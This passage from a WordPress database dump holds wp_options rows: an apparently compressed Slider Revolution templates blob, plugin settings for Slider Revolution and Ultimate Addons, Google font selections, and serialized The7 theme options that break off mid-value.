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','no'),
(804,'rs-templates-counter','0','no'),
(805,'revslider_table_version','1.0.12','yes'),
(808,'ultimate_row','enable','yes'),
(809,'ultimate_animation','disable','yes'),
(810,'revslider_update_version','6.6.0','yes'),
(811,'ultimate_google_fonts','a:0:{}','no'),
(812,'ultimate_selected_google_fonts','a:2:{i:0;a:4:{s:11:\"font_family\";s:9:\"Open+Sans\";s:9:\"font_name\";s:9:\"Open Sans\";s:8:\"variants\";a:9:{i:0;a:2:{s:13:\"variant_value\";s:3:\"300\";s:16:\"variant_selected\";s:5:\"false\";}i:1;a:2:{s:13:\"variant_value\";s:9:\"300italic\";s:16:\"variant_selected\";s:5:\"false\";}i:2;a:2:{s:13:\"variant_value\";s:6:\"italic\";s:16:\"variant_selected\";s:5:\"false\";}i:3;a:2:{s:13:\"variant_value\";s:3:\"600\";s:16:\"variant_selected\";s:4:\"true\";}i:4;a:2:{s:13:\"variant_value\";s:9:\"600italic\";s:16:\"variant_selected\";s:5:\"false\";}i:5;a:2:{s:13:\"variant_value\";s:3:\"700\";s:16:\"variant_selected\";s:4:\"true\";}i:6;a:2:{s:13:\"variant_value\";s:9:\"700italic\";s:16:\"variant_selected\";s:5:\"false\";}i:7;a:2:{s:13:\"variant_value\";s:3:\"800\";s:16:\"variant_selected\";s:4:\"true\";}i:8;a:2:{s:13:\"variant_value\";s:9:\"800italic\";s:16:\"variant_selected\";s:5:\"false\";}}s:7:\"subsets\";a:7:{i:0;a:2:{s:12:\"subset_value\";s:10:\"vietnamese\";s:15:\"subset_selected\";s:5:\"false\";}i:1;a:2:{s:12:\"subset_value\";s:5:\"greek\";s:15:\"subset_selected\";s:5:\"false\";}i:2;a:2:{s:12:\"subset_value\";s:9:\"latin-ext\";s:15:\"subset_selected\";s:5:\"false\";}i:3;a:2:{s:12:\"subset_value\";s:12:\"cyrillic-ext\";s:15:\"subset_selected\";s:5:\"false\";}i:4;a:2:{s:12:\"subset_value\";s:5:\"latin\";s:15:\"subset_selected\";s:5:\"false\";}i:5;a:2:{s:12:\"subset_value\";s:8:\"cyrillic\";s:15:\"subset_selected\";s:5:\"false\";}i:6;a:2:{s:12:\"subset_value\";s:9:\"greek-ext\";s:15:\"subset_selected\";s:5:\"false\";}}}i:1;a:4:{s:11:\"font_family\";s:7:\"Raleway\";s:9:\"font_name\";s:7:\"Raleway\";s:8:\"variants\";a:17:{i:0;a:2:{s:13:\"variant_value\";s:3:\"100\";s:16:\"variant_selected\";s:5:\"false\";}i:1;a:2:{s:13:\"variant_value\";s:9:\"100italic\";s:16:\"variant_selected\";s:5:\"false\";}i:2;a:2:{s:13:\"variant_value\";s:3:\"200\";s:16:\"variant_selected\";s:5:\"false\";}i:3;a:2:{s:13:\"variant_value\";s:9:\"200italic\";s:16:\"variant_selected\";s:5:\"false\";}i:4;a:2:{s:13:\"variant_value\";s:3:\"300\";s:16:\"variant_selected\";s:5:\"false\";}i:5;a:2:{s:13:\"variant_value\";s:9:\"300italic\";s:16:\"variant_selected\";s:5:\"false\";}i:6;a:2:{s:13:\"variant_value\";s:6:\"italic\";s:16:\"variant_selected\";s:5:\"false\";}i:7;a:2:{s:13:\"variant_value\";s:3:\"500\";s:16:\"variant_selected\";s:5:\"false\";}i:8;a:2:{s:13:\"variant_value\";s:9:\"500italic\";s:16:\"variant_selected\";s:5:\"false\";}i:9;a:2:{s:13:\"variant_value\";s:3:\"600\";s:16:\"variant_selected\";s:5:\"false\";}i:10;a:2:{s:13:\"variant_value\";s:9:\"600italic\";s:16:\"variant_selected\";s:5:\"false\";}i:11;a:2:{s:13:\"variant_value\";s:3:\"700\";s:16:\"variant_selected\";s:4:\"true\";}i:12;a:2:{s:13:\"variant_value\";s:9:\"700italic\";s:16:\"variant_selected\";s:5:\"false\";}i:13;a:2:{s:13:\"variant_value\";s:3:\"800\";s:16:\"variant_selected\";s:5:\"false\";}i:14;a:2:{s:13:\"variant_value\";s:9:\"800italic\";s:16:\"variant_selected\";s:5:\"false\";}i:15;a:2:{s:13:\"variant_value\";s:3:\"900\";s:16:\"variant_selected\";s:5:\"false\";}i:16;a:2:{s:13:\"variant_value\";s:9:\"900italic\";s:16:\"variant_selected\";s:5:\"false\";}}s:7:\"subsets\";a:2:{i:0;a:2:{s:12:\"subset_value\";s:9:\"latin-ext\";s:15:\"subset_selected\";s:5:\"false\";}i:1;a:2:{s:12:\"subset_value\";s:5:\"latin\";s:15:\"subset_selected\";s:5:\"false\";}}}}','yes'),
(813,'widget_rev-slider-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(815,'ultimate_updater','enabled','yes'),
(816,'ultimate_constants','a:3:{s:24:\"ULTIMATE_NO_UPDATE_CHECK\";b:0;s:28:\"ULTIMATE_NO_EDIT_PAGE_NOTICE\";b:0;s:30:\"ULTIMATE_NO_PLUGIN_PAGE_NOTICE\";b:0;}','yes'),
(817,'ultimate_modules','a:44:{i:0;s:18:\"ultimate_animation\";i:1;s:16:\"ultimate_buttons\";i:2;s:18:\"ultimate_countdown\";i:3;s:17:\"ultimate_flip_box\";i:4;s:20:\"ultimate_google_maps\";i:5;s:22:\"ultimate_google_trends\";i:6;s:17:\"ultimate_headings\";i:7;s:22:\"ultimate_icon_timeline\";i:8;s:17:\"ultimate_info_box\";i:9;s:20:\"ultimate_info_circle\";i:10;s:18:\"ultimate_info_list\";i:11;s:20:\"ultimate_info_tables\";i:12;s:28:\"ultimate_interactive_banners\";i:13;s:29:\"ultimate_interactive_banner_2\";i:14;s:15:\"ultimate_modals\";i:15;s:17:\"ultimate_parallax\";i:16;s:23:\"ultimate_pricing_tables\";i:17;s:15:\"ultimate_spacer\";i:18;s:22:\"ultimate_stats_counter\";i:19;s:20:\"ultimate_swatch_book\";i:20;s:14:\"ultimate_icons\";i:21;s:18:\"ultimate_list_icon\";i:22;s:17:\"ultimate_carousel\";i:23;s:18:\"ultimate_fancytext\";i:24;s:22:\"ultimate_highlight_box\";i:25;s:20:\"ultimate_info_banner\";i:26;s:15:\"ultimate_ihover\";i:27;s:16:\"ultimate_hotspot\";i:28;s:21:\"ultimate_video_banner\";i:29;s:11:\"woocomposer\";i:30;s:20:\"ultimate_dual_button\";i:31;s:13:\"ultimate_link\";i:32;s:19:\"ultimate_fancy_text\";i:33;s:23:\"ultimate_hightlight_box\";i:34;s:20:\"ultimate_content_box\";i:35;s:24:\"ultimate_image_separator\";i:36;s:27:\"ultimate_expandable_section\";i:37;s:12:\"ultimate_tab\";i:38;s:23:\"ultimate_sticky_section\";i:39;s:13:\"ultimate_team\";i:40;s:21:\"ultimate_range_slider\";i:41;s:15:\"ultimate_videos\";i:42;s:16:\"ultimate_ribbons\";i:43;s:20:\"ultimate_dual_colors\";}','yes'),
(819,'rs_cache_overlay','6.5.19','yes'),
(823,'the7_demo_history','a:2:{s:11:\"old-landing\";a:9:{s:23:\"the7_dashboard_settings\";a:13:{s:9:\"mega-menu\";b:1;s:29:\"elementor-buttons-integration\";b:1;s:21:\"elementor-theme-style\";b:1;s:37:\"elementor-zero-paragraph-last-spacing\";b:1;s:29:\"deprecated_mega_menu_settings\";b:0;s:9:\"portfolio\";b:1;s:26:\"portfolio-breadcrumbs-text\";s:0:\"\";s:12:\"testimonials\";b:0;s:4:\"team\";b:0;s:5:\"logos\";b:0;s:8:\"benefits\";b:0;s:6:\"albums\";b:0;s:9:\"slideshow\";b:0;}s:11:\"wp_settings\";a:2:{s:13:\"show_on_front\";s:5:\"posts\";s:13:\"page_on_front\";s:1:\"0\";}s:14:\"menu_locations\";a:0:{}s:16:\"widgets_settings\";a:10:{s:15:\"widget_archives\";a:1:{s:12:\"_multiwidget\";i:1;}s:11:\"widget_meta\";a:1:{s:12:\"_multiwidget\";i:1;}s:13:\"widget_search\";a:1:{s:12:\"_multiwidget\";i:1;}s:11:\"widget_text\";a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}s:17:\"widget_categories\";a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}s:19:\"widget_recent-posts\";a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}s:22:\"widget_recent-comments\";a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}s:10:\"widget_rss\";a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}s:26:\"widget_presscore-portfolio\";a:1:{s:12:\"_multiwidget\";i:1;}s:16:\"sidebars_widgets\";a:4:{s:19:\"wp_inactive_widgets\";a:1:{i:0;i:9022;}s:9:\"sidebar_1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar_2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}s:13:\"array_version\";i:3;}}s:10:\"post_types\";b:1;s:22:\"attachments_in_process\";i:3;s:11:\"attachments\";s:8:\"original\";s:11:\"rev_sliders\";a:3:{i:0;i:1;i:1;i:2;i:2;i:3;}s:13:\"theme_options\";a:1:{s:4:\"the7\";a:972:{s:31:\"advanced-fvm_enable_integration\";s:1:\"0\";s:27:\"advanced-fvm_script_timeout\";s:4:\"50ms\";s:35:\"advanced-normalize_resize_on_mobile\";s:1:\"1\";s:25:\"advanced-speed_img_resize\";s:1:\"1\";s:21:\"blog-fancy_date-style\";s:8:\"vertical\";s:26:\"blog-thumbnail_proportions\";a:2:{s:5:\"width\";i:2;s:6:\"height\";i:1;}s:19:\"blog-thumbnail_size\";s:6:\"resize\";s:19:\"bottom_bar-bg_color\";s:22:\"rgba(255,255,255,0.12)\";s:19:\"bottom_bar-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:25:\"bottom_bar-collapse_after\";s:5:\"990px\";s:16:\"bottom_bar-color\";s:7:\"#eeeeee\";s:21:\"bottom_bar-copyrights\";b:0;s:18:\"bottom_bar-credits\";s:1:\"1\";s:18:\"bottom_bar-enabled\";s:1:\"1\";s:17:\"bottom_bar-height\";s:4:\"60px\";s:17:\"bottom_bar-layout\";s:9:\"logo_left\";s:20:\"bottom_bar-line_size\";s:3:\"1px\";s:23:\"bottom_bar-logo-padding\";s:16:\"8px 12px 8px 0px\";s:18:\"bottom_bar-logo_hd\";a:2:{i:0;s:65:\"/inc/presets/images/full/skin11r.bottom-bar-logo-hd.png?w=56&h=56\";i:1;i:0;}s:23:\"bottom_bar-logo_regular\";a:2:{i:0;s:70:\"/inc/presets/images/full/skin11r.bottom-bar-logo-regular.png?w=28&h=28\";i:1;i:0;}s:30:\"bottom_bar-menu-collapse_after\";s:5:\"778px\";s:18:\"bottom_bar-padding\";s:9:\"10px 10px\";s:16:\"bottom_bar-style\";s:18:\"content_width_line\";s:15:\"bottom_bar-text\";b:0;s:22:\"breadcrumbs-typography\";a:4:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"14\";s:11:\"line_height\";s:2:\"24\";}s:20:\"breadcrumbs_bg_color\";s:17:\"rgba(89,68,146,1)\";s:24:\"breadcrumbs_border_color\";s:19:\"rgba(255,255,255,0)\";s:25:\"breadcrumbs_border_radius\";s:3:\"2px\";s:24:\"breadcrumbs_border_width\";s:3:\"0px\";s:18:\"breadcrumbs_margin\";s:16:\"10px 0px 0px 0px\";s:19:\"breadcrumbs_padding\";s:15:\"0px 0px 0px 